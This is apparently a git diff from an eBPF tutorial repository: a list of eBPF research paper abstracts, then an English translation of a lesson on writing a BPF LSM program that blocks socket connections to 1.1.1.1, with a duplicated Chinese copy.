[eunomia-bpf](https://github.com/eunomia-bpf) and eBPF tutorials at [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial). I'm also looking for a PhD position in the area of systems and networking in 2024/2025. My [Github](https://github.com/yunwei37) and [email](yunwei356@gmail.com). - -## XRP: In-Kernel Storage Functions with eBPF - -With the emergence of microsecond-scale NVMe storage devices, the Linux kernel storage stack overhead has become significant, almost doubling access times. 
We present XRP, a framework that allows applications to execute user-defined storage functions, such as index lookups or aggregations, from an eBPF hook in the NVMe driver, safely bypassing most of the kernel’s storage stack. To preserve file system semantics, XRP propagates a small amount of kernel state to its NVMe driver hook where the user-registered eBPF functions are called. We show how two key-value stores, BPF-KV, a simple B+-tree key-value store, and WiredTiger, a popular log-structured merge tree storage engine, can leverage XRP to significantly improve throughput and latency. - -OSDI '22 Best Paper: - -## Specification and verification in the field: Applying formal methods to BPF just-in-time compilers in the Linux kernel - -This paper describes our experience applying formal methods to a critical component in the Linux kernel, the just-in-time compilers ("JITs") for the Berkeley Packet Filter (BPF) virtual machine. We verify these JITs using Jitterbug, the first framework to provide a precise specification of JIT correctness that is capable of ruling out real-world bugs, and an automated proof strategy that scales to practical implementations. Using Jitterbug, we have designed, implemented, and verified a new BPF JIT for 32-bit RISC-V, found and fixed 16 previously unknown bugs in five other deployed JITs, and developed new JIT optimizations; all of these changes have been upstreamed to the Linux kernel. The results show that it is possible to build a verified component within a large, unverified system with careful design of specification and proof strategy. - -OSDI 20: - -## λ-IO: A Unified IO Stack for Computational Storage - -The emerging computational storage device offers an opportunity for in-storage computing. It alleviates the overhead of data movement between the host and the device, and thus accelerates data-intensive applications. In this paper, we present λ-IO, a unified IO stack managing both computation and storage resources across the host and the device. We propose a set of designs – interface, runtime, and scheduling – to tackle three critical issues. We implement λ-IO in full-stack software and hardware environment, and evaluate it with synthetic and real applications against Linux IO, showing up to 5.12× performance improvement. - -FAST23: - -## Extension Framework for File Systems in User space - -User file systems offer numerous advantages over their in-kernel implementations, such as ease of development and better system reliability. However, they incur heavy performance penalty. We observe that existing user file system frameworks are highly general; they consist of a minimal interposition layer in the kernel that simply forwards all low-level requests to user space. While this design offers flexibility, it also severely degrades performance due to frequent kernel-user context switching. - -This work introduces ExtFUSE, a framework for developing extensible user file systems that also allows applications to register "thin" specialized request handlers in the kernel to meet their specific operative needs, while retaining the complex functionality in user space. Our evaluation with two FUSE file systems shows that ExtFUSE can improve the performance of user file systems with less than a few hundred lines on average. ExtFUSE is available on GitHub. 
- -ATC 19: - -## Electrode: Accelerating Distributed Protocols with eBPF - -Implementing distributed protocols under a standard Linux kernel networking stack enjoys the benefits of load-aware CPU scaling, high compatibility, and robust security and isolation. However, it suffers from low performance because of excessive user-kernel crossings and kernel networking stack traversing. We present Electrode with a set of eBPF-based performance optimizations designed for distributed protocols. These optimizations get executed in the kernel before the networking stack but achieve similar functionalities as were implemented in user space (e.g., message broadcasting, collecting quorum of acknowledgments), thus avoiding the overheads incurred by user-kernel crossings and kernel networking stack traversing. We show that when applied to a classic Multi-Paxos state machine replication protocol, Electrode improves its throughput by up to 128.4% and latency by up to 41.7%. - -NSDI 23: - -## BMC: Accelerating Memcached using Safe In-kernel Caching and Pre-stack Processing - -In-memory key-value stores are critical components that help scale large internet services by providing low-latency access to popular data. Memcached, one of the most popular key-value stores, suffers from performance limitations inherent to the Linux networking stack and fails to achieve high performance when using high-speed network interfaces. While the Linux network stack can be bypassed using DPDK based solutions, such approaches require a complete redesign of the software stack and induce high CPU utilization even when client load is low. - -To overcome these limitations, we present BMC, an in-kernel cache for Memcached that serves requests before the execution of the standard network stack. Requests to the BMC cache are treated as part of the NIC interrupts, which allows performance to scale with the number of cores serving the NIC queues. To ensure safety, BMC is implemented using eBPF. Despite the safety constraints of eBPF, we show that it is possible to implement a complex cache service. Because BMC runs on commodity hardware and requires modification of neither the Linux kernel nor the Memcached application, it can be widely deployed on existing systems. BMC optimizes the processing time of Facebook-like small-size requests. On this target workload, our evaluations show that BMC improves throughput by up to 18x compared to the vanilla Memcached application and up to 6x compared to an optimized version of Memcached that uses the SO_REUSEPORT socket flag. In addition, our results also show that BMC has negligible overhead and does not deteriorate throughput when treating non-target workloads. - -NSDI 21: - -## hXDP: Efficient Software Packet Processing on FPGA NICs - -FPGA accelerators on the NIC enable the offloading of expensive packet processing tasks from the CPU. However, FPGAs have limited resources that may need to be shared among diverse applications, and programming them is difficult. - -We present a solution to run Linux's eXpress Data Path programs written in eBPF on FPGAs, using only a fraction of the available hardware resources while matching the performance of high-end CPUs. The iterative execution model of eBPF is not a good fit for FPGA accelerators. Nonetheless, we show that many of the instructions of an eBPF program can be compressed, parallelized or completely removed, when targeting a purpose-built FPGA executor, thereby significantly improving performance. 
We leverage that to design hXDP, which includes (i) an optimizing-compiler that parallelizes and translates eBPF bytecode to an extended eBPF Instruction-set Architecture defined by us; a (ii) soft-processor to execute such instructions on FPGA; and (iii) an FPGA-based infrastructure to provide XDP's maps and helper functions as defined within the Linux kernel. - -We implement hXDP on an FPGA NIC and evaluate it running real-world unmodified eBPF programs. Our implementation is clocked at 156.25MHz, uses about 15% of the FPGA resources, and can run dynamically loaded programs. Despite these modest requirements, it achieves the packet processing throughput of a high-end CPU core and provides a 10x lower packet forwarding latency. - -OSDI 20: - -## Network-Centric Distributed Tracing with DeepFlow: Troubleshooting Your Microservices in Zero Code - -Microservices are becoming more complicated, posing new challenges for traditional performance monitoring solutions. On the one hand, the rapid evolution of microservices places a significant burden on the utilization and maintenance of existing distributed tracing frameworks. On the other hand, complex infrastructure increases the probability of network performance problems and creates more blind spots on the network side. In this paper, we present DeepFlow, a network-centric distributed tracing framework for troubleshooting microservices. DeepFlow provides out-of-the-box tracing via a network-centric tracing plane and implicit context propagation. In addition, it eliminates blind spots in network infrastructure, captures network metrics in a low-cost way, and enhances correlation between different components and layers. We demonstrate analytically and empirically that DeepFlow is capable of locating microservice performance anomalies with negligible overhead. DeepFlow has already identified over 71 critical performance anomalies for more than 26 companies and has been utilized by hundreds of individual developers. Our production evaluations demonstrate that DeepFlow is able to save users hours of instrumentation efforts and reduce troubleshooting time from several hours to just a few minutes. - -SIGCOMM 23: - -## Fast In-kernel Traffic Sketching in eBPF - -The extended Berkeley Packet Filter (eBPF) is an infrastructure that allows to dynamically load and run micro-programs directly in the Linux kernel without recompiling it. - -In this work, we study how to develop high-performance network measurements in eBPF. We take sketches as case-study, given their ability to support a wide-range of tasks while providing low-memory footprint and accuracy guarantees. We implemented NitroSketch, the state-of-the-art sketch for user-space networking and show that best practices in user-space networking cannot be directly applied to eBPF, because of its different performance characteristics. By applying our lesson learned we improve its performance by 40% compared to a naive implementation. - -SIGCOMM 23: - -## SPRIGHT: extracting the server from serverless computing! high-performance eBPF-based event-driven, shared-memory processing - -Serverless computing promises an efficient, low-cost compute capability in cloud environments. However, existing solutions, epitomized by open-source platforms such as Knative, include heavyweight components that undermine this goal of serverless computing. 
Additionally, such serverless platforms lack dataplane optimizations to achieve efficient, high-performance function chains that facilitate the popular microservices development paradigm. Their use of unnecessarily complex and duplicate capabilities for building function chains severely degrades performance. 'Cold-start' latency is another deterrent. - -We describe SPRIGHT, a lightweight, high-performance, responsive serverless framework. SPRIGHT exploits shared memory processing and dramatically improves the scalability of the dataplane by avoiding unnecessary protocol processing and serialization-deserialization overheads. SPRIGHT extensively leverages event-driven processing with the extended Berkeley Packet Filter (eBPF). We creatively use eBPF's socket message mechanism to support shared memory processing, with overheads being strictly load-proportional. Compared to constantly-running, polling-based DPDK, SPRIGHT achieves the same dataplane performance with 10× less CPU usage under realistic workloads. Additionally, eBPF benefits SPRIGHT, by replacing heavyweight serverless components, allowing us to keep functions 'warm' with negligible penalty. - -Our preliminary experimental results show that SPRIGHT achieves an order of magnitude improvement in throughput and latency compared to Knative, while substantially reducing CPU usage, and obviates the need for 'cold-start'. - - - -## KEN: Kernel Extensions using Natural Language - -The ability to modify and extend an operating system is an important feature for improving a system's security, reliability, and performance. The extended Berkeley Packet Filters (eBPF) ecosystem has emerged as the standard mechanism for extending the Linux kernel and has recently been ported to Windows. eBPF programs inject new logic into the kernel that the system will execute before or after existing logic. While the eBPF ecosystem provides a flexible mechanism for kernel extension, it is difficult for developers to write eBPF programs today. An eBPF developer must have deep knowledge of the internals of the operating system to determine where to place logic and cope with programming limitations on the control flow and data accesses of their eBPF program enforced by the eBPF verifier. This paper presents KEN, an alternative framework that alleviates the difficulty of writing an eBPF program by allowing Kernel Extensions to be written in Natural language. KEN uses recent advances in large language models (LLMs) to synthesize an eBPF program given a user's English language prompt. To ensure that LLM's output is semantically equivalent to the user's prompt, KEN employs a combination of LLM-empowered program comprehension, symbolic execution, and a series of feedback loops. KEN's key novelty is the combination of these techniques. In particular, the system uses symbolic execution in a novel structure that allows it to combine the results of program synthesis and program comprehension and build on the recent success that LLMs have shown for each of these tasks individually. To evaluate KEN, we developed a new corpus of natural language prompts for eBPF programs. We show that KEN produces correct eBPF programs on 80% which is an improvement of a factor of 2.67 compared to an LLM-empowered program synthesis baseline. - -eBPF'24: and arxiv - -## Programmable System Call Security with eBPF - -System call filtering is a widely used security mechanism for protecting a shared OS kernel against untrusted user applications. 
However, existing system call filtering techniques either are too expensive due to the context switch overhead imposed by userspace agents, or lack sufficient programmability to express advanced policies. Seccomp, Linux's system call filtering module, is widely used by modern container technologies, mobile apps, and system management services. Despite the adoption of the classic BPF language (cBPF), security policies in Seccomp are mostly limited to static allow lists, primarily because cBPF does not support stateful policies. Consequently, many essential security features cannot be expressed precisely and/or require kernel modifications. -In this paper, we present a programmable system call filtering mechanism, which enables more advanced security policies to be expressed by leveraging the extended BPF language (eBPF). More specifically, we create a new Seccomp eBPF program type, exposing, modifying or creating new eBPF helper functions to safely manage filter state, access kernel and user state, and utilize synchronization primitives. Importantly, our system integrates with existing kernel privilege and capability mechanisms, enabling unprivileged users to install advanced filters safely. Our evaluation shows that our eBPF-based filtering can enhance existing policies (e.g., reducing the attack surface of early execution phase by up to 55.4% for temporal specialization), mitigate real-world vulnerabilities, and accelerate filters. - - - -## Cross Container Attacks: The Bewildered eBPF on Clouds - -The extended Berkeley Packet Filter (eBPF) provides powerful and flexible kernel interfaces to extend the kernel functions for user space programs via running bytecode directly in the kernel space. It has been widely used by cloud services to enhance container security, network management, and system observability. However, we discover that the offensive eBPF that have been extensively discussed in Linux hosts can bring new attack surfaces to containers. With eBPF tracing features, attackers can break the container's isolation and attack the host, e.g., steal sensitive data, DoS, and even escape the container. In this paper, we study the eBPF-based cross container attacks and reveal their security impacts in real world services. With eBPF attacks, we successfully compromise five online Jupyter/Interactive Shell services and the Cloud Shell of Google Cloud Platform. Furthermore, we find that the Kubernetes services offered by three leading cloud vendors can be exploited to launch cross-node attacks after the attackers escape the container via eBPF. Specifically, in Alibaba's Kubernetes services, attackers can compromise the whole cluster by abusing their over-privileged cloud metrics or management Pods. Unfortunately, the eBPF attacks on containers are seldom known and can hardly be discovered by existing intrusion detection systems. Also, the existing eBPF permission model cannot confine the eBPF and ensure secure usage in shared-kernel container environments. To this end, we propose a new eBPF permission model to counter the eBPF attacks in containers. - - - -## Comparing Security in eBPF and WebAssembly - -This paper examines the security of eBPF and WebAssembly (Wasm), two technologies that have gained widespread adoption in recent years, despite being designed for very different use cases and environments. 
While eBPF is a technology primarily used within operating system kernels such as Linux, Wasm is a binary instruction format designed for a stack-based virtual machine with use cases extending beyond the web. Recognizing the growth and expanding ambitions of eBPF, Wasm may provide instructive insights, given its design around securely executing arbitrary untrusted programs in complex and hostile environments such as web browsers and clouds. We analyze the security goals, community evolution, memory models, and execution models of both technologies, and conduct a comparative security assessment, exploring memory safety, control flow integrity, API access, and side-channels. Our results show that eBPF has a history of focusing on performance first and security second, while Wasm puts more emphasis on security at the cost of some runtime overheads. Considering language-based restrictions for eBPF and a security model for API access are fruitful directions for future work. - - - -More about can be found in the first workshop: - -## A flow-based IDS using Machine Learning in eBPF - -eBPF is a new technology which allows dynamically loading pieces of code into the Linux kernel. It can greatly speed up networking since it enables the kernel to process certain packets without the involvement of a userspace program. So far eBPF has been used for simple packet filtering applications such as firewalls or Denial of Service protection. We show that it is possible to develop a flow based network intrusion detection system based on machine learning entirely in eBPF. Our solution uses a decision tree and decides for each packet whether it is malicious or not, considering the entire previous context of the network flow. We achieve a performance increase of over 20% compared to the same solution implemented as a userspace program. - - - -## Femto-containers: lightweight virtualization and fault isolation for small software functions on low-power IoT microcontrollers - -Low-power operating system runtimes used on IoT microcontrollers typically provide rudimentary APIs, basic connectivity and, sometimes, a (secure) firmware update mechanism. In contrast, on less constrained hardware, networked software has entered the age of serverless, microservices and agility. With a view to bridge this gap, in the paper we design Femto-Containers, a new middleware runtime which can be embedded on heterogeneous low-power IoT devices. Femto-Containers enable the secure deployment, execution and isolation of small virtual software functions on low-power IoT devices, over the network. We implement Femto-Containers, and provide integration in RIOT, a popular open source IoT operating system. We then evaluate the performance of our implementation, which was formally verified for fault-isolation, guaranteeing that RIOT is shielded from logic loaded and executed in a Femto-Container. Our experiments on various popular micro-controller architectures (Arm Cortex-M, ESP32 and RISC-V) show that Femto-Containers offer an attractive trade-off in terms of memory footprint overhead, energy consumption, and security. 
- - - -> The original link of this article: diff --git a/src/19-lsm-connect/README.md b/src/19-lsm-connect/README.md index 9c743f3..67f89c8 100644 --- a/src/19-lsm-connect/README.md +++ b/src/19-lsm-connect/README.md @@ -1,51 +1,51 @@ -# eBPF 入门实践教程:使用 LSM 进行安全检测防御 +# eBPF Tutorial by Example 19: Security Detection and Defense using LSM -eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying the kernel source code. This feature enables eBPF to provide high flexibility and performance, making it widely applicable in network and system performance analysis. The same applies to eBPF applications in security, and this article will introduce how to use the eBPF LSM (Linux Security Modules) mechanism to implement a simple security check program. -## 背景 +## Background -LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的) +LSM has been an official security framework in the Linux kernel since Linux 2.6, and security implementations based on it include SELinux and AppArmor. With the introduction of BPF LSM in Linux 5.7, system developers have been able to freely implement function-level security checks. This article provides an example of limiting access to a specific IPv4 address through the socket connect function using a BPF LSM program. (This demonstrates its high control precision.) -## LSM 概述 +## Overview of LSM -LSM(Linux Security Modules)是 Linux 内核中用于支持各种计算机安全模型的框架。LSM 在 Linux 内核安全相关的关键路径上预置了一批 hook 点,从而实现了内核和安全模块的解耦,使不同的安全模块可以自由地在内核中加载/卸载,无需修改原有的内核代码就可以加入安全检查功能。 +LSM (Linux Security Modules) is a framework in the Linux kernel that supports various computer security models. LSM predefines a set of hook points on critical paths related to Linux kernel security, decoupling the kernel from security modules. This allows different security modules to be loaded/unloaded in the kernel freely without modifying the existing kernel code, thus enabling them to provide security inspection features. -在过去,使用 LSM 主要通过配置已有的安全模块(如 SELinux 和 AppArmor)或编写自己的内核模块;而在 Linux 5.7 引入 BPF LSM 机制后,一切都变得不同了:现在,开发人员可以通过 eBPF 编写自定义的安全策略,并将其动态加载到内核中的 LSM 挂载点,而无需配置或编写内核模块。 +In the past, using LSM mainly involved configuring existing security modules like SELinux and AppArmor or writing custom kernel modules. However, with the introduction of the BPF LSM mechanism in Linux 5.7, everything changed. Now, developers can write custom security policies using eBPF and dynamically load them into the LSM mount points in the kernel without configuring or writing kernel modules. 
-现在 LSM 支持的 hook 点包括但不限于:
+Some of the hook points currently supported by LSM include:

-+ 对文件的打开、创建、删除和移动等;
-+ 文件系统的挂载;
-+ 对 task 和 process 的操作;
-+ 对 socket 的操作(创建、绑定 socket,发送和接收消息等);
++ File open, creation, deletion, and movement;
++ Filesystem mounting;
++ Operations on tasks and processes;
++ Operations on sockets (creating, binding sockets, sending and receiving messages, etc.);

-更多 hook 点可以参考 [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h)。
+For more hook points, refer to [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h).

-## 确认 BPF LSM 是否可用
+## Verifying BPF LSM Availability

-首先,请确认内核版本高于 5.7。接下来,可以通过
+First, please confirm that your kernel version is higher than 5.7. Next, you can use the following command to check if BPF LSM support is enabled:

```console
$ cat /boot/config-$(uname -r) | grep BPF_LSM
CONFIG_BPF_LSM=y
```

-判断是否内核是否支持 BPF LSM。上述条件都满足的情况下,可以通过
+If the output contains `CONFIG_BPF_LSM=y`, BPF LSM is supported. Provided that the above conditions are met, you can use the following command to check if the output includes the `bpf` option:

```console
$ cat /sys/kernel/security/lsm
ndlock,lockdown,yama,integrity,apparmor
```

-查看输出是否包含 bpf 选项,如果输出不包含(像上面的例子),可以通过修改 `/etc/default/grub`:
+If the output does not include the `bpf` option (as in the example above), you can modify `/etc/default/grub`:

```conf
GRUB_CMDLINE_LINUX="lsm=ndlock,lockdown,yama,integrity,apparmor,bpf"
```

-并通过 `update-grub2` 命令更新 grub 配置(不同系统的对应命令可能不同),然后重启系统。
+Then, update the grub configuration using the `update-grub2` command (the corresponding command may vary depending on the system), and restart the system.

-## 编写 eBPF 程序
+## Writing eBPF Programs

```C
// lsm-connect.bpf.c
@@ -90,33 +90,32 @@ int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, in
 }
 return 0;
 }
-
```

-这是一段 C 实现的 eBPF 内核侧代码,它会阻碍所有试图通过 socket 对 1.1.1.1 的连接操作,其中:
+This is kernel-side eBPF code implemented in C. It blocks all socket connection attempts to 1.1.1.1. Note the following:

-+ `SEC("lsm/socket_connect")` 宏指出该程序期望的挂载点;
-+ 程序通过 `BPF_PROG` 宏定义(详情可查看 [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h));
-+ `restrict_connect` 是 `BPF_PROG` 宏要求的程序名;
-+ `ret` 是该挂载点上(潜在的)当前函数之前的 LSM 检查程序的返回值;
++ The `SEC("lsm/socket_connect")` macro indicates the expected mount point for this program.
++ The program is defined by the `BPF_PROG` macro (see [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h) for details).
++ `restrict_connect` is the program name required by the `BPF_PROG` macro.
++ `ret` is the return value of any LSM check programs that (potentially) ran before the current one at this mount point.

-整个程序的思路不难理解:
+The overall idea of the program is not difficult to understand:

-+ 首先,若其他安全检查函数返回值不为 0(不通过),则无需检查,直接返回不通过;
-+ 接下来,判断是否为 IPV4 的连接请求,并比较试图连接的地址是否为 1.1.1.1;
-+ 若请求地址为 1.1.1.1 则拒绝连接,否则允许连接;
++ First, if another security check function has already returned a non-zero value (a denial), there is no need to check further, and the denial is returned directly.
++ Next, it determines whether it is an IPv4 connection request and compares the address being connected to with 1.1.1.1.
++ If the requested address is 1.1.1.1 (the constant `16843009`; see the sketch below), the connection is blocked; otherwise, the connection is allowed.
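+The only magic number here is `blockme = 16843009`. The following small userspace snippet (not part of the tutorial's source; a sketch added purely for illustration) shows where it comes from: `inet_pton()` stores "1.1.1.1" in network byte order as the bytes 0x01 0x01 0x01 0x01, which read back as a 32-bit integer is 0x01010101 = 16843009.
+
+```C
+// ip_to_int.c: illustrative helper, build with `gcc ip_to_int.c -o ip_to_int`
+#include <stdio.h>
+#include <arpa/inet.h>
+
+int main(void)
+{
+    struct in_addr addr;
+
+    /* inet_pton() writes the address in network byte order,
+     * i.e. the bytes 0x01 0x01 0x01 0x01 for "1.1.1.1". */
+    if (inet_pton(AF_INET, "1.1.1.1", &addr) != 1)
+        return 1;
+
+    /* Read those bytes back as a 32-bit integer: 0x01010101 == 16843009. */
+    printf("%u\n", (unsigned int)addr.s_addr);
+    return 0;
+}
+```
+
+Because all four bytes of 1.1.1.1 happen to be equal, the value is the same on little- and big-endian hosts; for an address such as 1.2.3.4, keep in mind that `sin_addr.s_addr` is in network byte order when choosing the constant to compare against.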
-在程序运行期间,所有通过 socket 的连接操作都会被输出到 `/sys/kernel/debug/tracing/trace_pipe`。
+During the execution of the program, all connection operations through a socket will be output to `/sys/kernel/debug/tracing/trace_pipe`.

-## 编译运行
+## Compilation and Execution

-通过容器编译:
+Compile using a container:

```console
docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
```

-或是通过 `ecc` 编译:
+Or compile using `ecc`:

```console
$ ecc lsm-connect.bpf.c
@@ -124,13 +123,13 @@ Compiling bpf object...
Packing ebpf object and config into package.json...
```

-并通过 `ecli` 运行:
+And run using `ecli`:

```shell
sudo ecli run package.json
```

-接下来,可以打开另一个 terminal,并尝试访问 1.1.1.1:
+Next, open another terminal and try to access 1.1.1.1:

```console
$ ping 1.1.1.1
@@ -143,27 +142,29 @@ Connecting to 1.1.1.1:80... failed: Operation not permitted.
Retrying.
```

-同时,我们可以查看 `bpf_printk` 的输出:
+At the same time, we can view the output of `bpf_printk`:

```console
$ sudo cat /sys/kernel/debug/tracing/trace_pipe
 ping-7054 [000] d...1 6313.430872: bpf_trace_printk: lsm: found connect to 16843009
 ping-7054 [000] d...1 6313.430874: bpf_trace_printk: lsm: blocking 16843009
 curl-7058 [000] d...1 6316.346582: bpf_trace_printk: lsm: found connect to 16843009
 curl-7058 [000] d...1 6316.346584: bpf_trace_printk: lsm: blocking 16843009
 wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009
 wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009
```

-完整源代码:
+Complete source code:

-## 总结
+## Summary

-本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 `BPF_PROG` 宏定义函数,并通过 `SEC` 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。
+This article introduces how to use BPF LSM to restrict access to a specific IPv4 address through a socket. We can enable the LSM BPF mount point by modifying the GRUB configuration file. In the eBPF program, we define functions using the `BPF_PROG` macro and specify the mount point using the `SEC` macro. In the implementation of the function, we follow the principle of "cannot override a denial" in the LSM security-checking module and restrict the socket connection request based on the destination address of the request.

-如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。
+If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials.
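+> Aside (not from the original tutorial): if you prefer plain libbpf over the `ecc`/`ecli` toolchain, a loader for this program can be sketched as below. It assumes the object was compiled to `lsm-connect.bpf.o` and a skeleton was generated with `bpftool gen skeleton lsm-connect.bpf.o > lsm-connect.skel.h`; the `lsm_connect_bpf__*` names follow bpftool's usual naming convention.
+
+```C
+// loader.c: hypothetical minimal libbpf loader (sketch for illustration only).
+#include <stdio.h>
+#include <unistd.h>
+#include "lsm-connect.skel.h" /* generated by `bpftool gen skeleton` */
+
+int main(void)
+{
+    /* Open the object and load its programs and maps into the kernel. */
+    struct lsm_connect_bpf *skel = lsm_connect_bpf__open_and_load();
+    if (!skel) {
+        fprintf(stderr, "failed to open/load BPF skeleton\n");
+        return 1;
+    }
+
+    /* Auto-attach the SEC("lsm/socket_connect") program. */
+    if (lsm_connect_bpf__attach(skel)) {
+        fprintf(stderr, "failed to attach LSM program\n");
+        lsm_connect_bpf__destroy(skel);
+        return 1;
+    }
+
+    printf("lsm/socket_connect attached; press Ctrl-C to exit\n");
+    while (1)
+        pause(); /* the filter stays active while this process holds the link */
+
+    /* Never reached; the kernel releases the link when the process exits. */
+    lsm_connect_bpf__destroy(skel);
+    return 0;
+}
+```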
-## 参考 +## References + + + +> The original link of this article: diff --git a/src/19-lsm-connect/README.zh.md b/src/19-lsm-connect/README.zh.md new file mode 100644 index 0000000..9c743f3 --- /dev/null +++ b/src/19-lsm-connect/README.zh.md @@ -0,0 +1,169 @@ +# eBPF 入门实践教程:使用 LSM 进行安全检测防御 + +eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。 + +## 背景 + +LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的) + +## LSM 概述 + +LSM(Linux Security Modules)是 Linux 内核中用于支持各种计算机安全模型的框架。LSM 在 Linux 内核安全相关的关键路径上预置了一批 hook 点,从而实现了内核和安全模块的解耦,使不同的安全模块可以自由地在内核中加载/卸载,无需修改原有的内核代码就可以加入安全检查功能。 + +在过去,使用 LSM 主要通过配置已有的安全模块(如 SELinux 和 AppArmor)或编写自己的内核模块;而在 Linux 5.7 引入 BPF LSM 机制后,一切都变得不同了:现在,开发人员可以通过 eBPF 编写自定义的安全策略,并将其动态加载到内核中的 LSM 挂载点,而无需配置或编写内核模块。 + +现在 LSM 支持的 hook 点包括但不限于: + ++ 对文件的打开、创建、删除和移动等; ++ 文件系统的挂载; ++ 对 task 和 process 的操作; ++ 对 socket 的操作(创建、绑定 socket,发送和接收消息等); + +更多 hook 点可以参考 [lsm_hooks.h](https://github.com/torvalds/linux/blob/master/include/linux/lsm_hooks.h)。 + +## 确认 BPF LSM 是否可用 + +首先,请确认内核版本高于 5.7。接下来,可以通过 + +```console +$ cat /boot/config-$(uname -r) | grep BPF_LSM +CONFIG_BPF_LSM=y +``` + +判断是否内核是否支持 BPF LSM。上述条件都满足的情况下,可以通过 + +```console +$ cat /sys/kernel/security/lsm +ndlock,lockdown,yama,integrity,apparmor +``` + +查看输出是否包含 bpf 选项,如果输出不包含(像上面的例子),可以通过修改 `/etc/default/grub`: + +```conf +GRUB_CMDLINE_LINUX="lsm=ndlock,lockdown,yama,integrity,apparmor,bpf" +``` + +并通过 `update-grub2` 命令更新 grub 配置(不同系统的对应命令可能不同),然后重启系统。 + +## 编写 eBPF 程序 + +```C +// lsm-connect.bpf.c +#include "vmlinux.h" +#include +#include +#include + +char LICENSE[] SEC("license") = "GPL"; + +#define EPERM 1 +#define AF_INET 2 + +const __u32 blockme = 16843009; // 1.1.1.1 -> int + +SEC("lsm/socket_connect") +int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address, int addrlen, int ret) +{ + // Satisfying "cannot override a denial" rule + if (ret != 0) + { + return ret; + } + + // Only IPv4 in this example + if (address->sa_family != AF_INET) + { + return 0; + } + + // Cast the address to an IPv4 socket address + struct sockaddr_in *addr = (struct sockaddr_in *)address; + + // Where do you want to go? + __u32 dest = addr->sin_addr.s_addr; + bpf_printk("lsm: found connect to %d", dest); + + if (dest == blockme) + { + bpf_printk("lsm: blocking %d", dest); + return -EPERM; + } + return 0; +} + +``` + +这是一段 C 实现的 eBPF 内核侧代码,它会阻碍所有试图通过 socket 对 1.1.1.1 的连接操作,其中: + ++ `SEC("lsm/socket_connect")` 宏指出该程序期望的挂载点; ++ 程序通过 `BPF_PROG` 宏定义(详情可查看 [tools/lib/bpf/bpf_tracing.h](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/tools/lib/bpf/bpf_tracing.h)); ++ `restrict_connect` 是 `BPF_PROG` 宏要求的程序名; ++ `ret` 是该挂载点上(潜在的)当前函数之前的 LSM 检查程序的返回值; + +整个程序的思路不难理解: + ++ 首先,若其他安全检查函数返回值不为 0(不通过),则无需检查,直接返回不通过; ++ 接下来,判断是否为 IPV4 的连接请求,并比较试图连接的地址是否为 1.1.1.1; ++ 若请求地址为 1.1.1.1 则拒绝连接,否则允许连接; + +在程序运行期间,所有通过 socket 的连接操作都会被输出到 `/sys/kernel/debug/tracing/trace_pipe`。 + +## 编译运行 + +通过容器编译: + +```console +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +或是通过 `ecc` 编译: + +```console +$ ecc lsm-connect.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... 
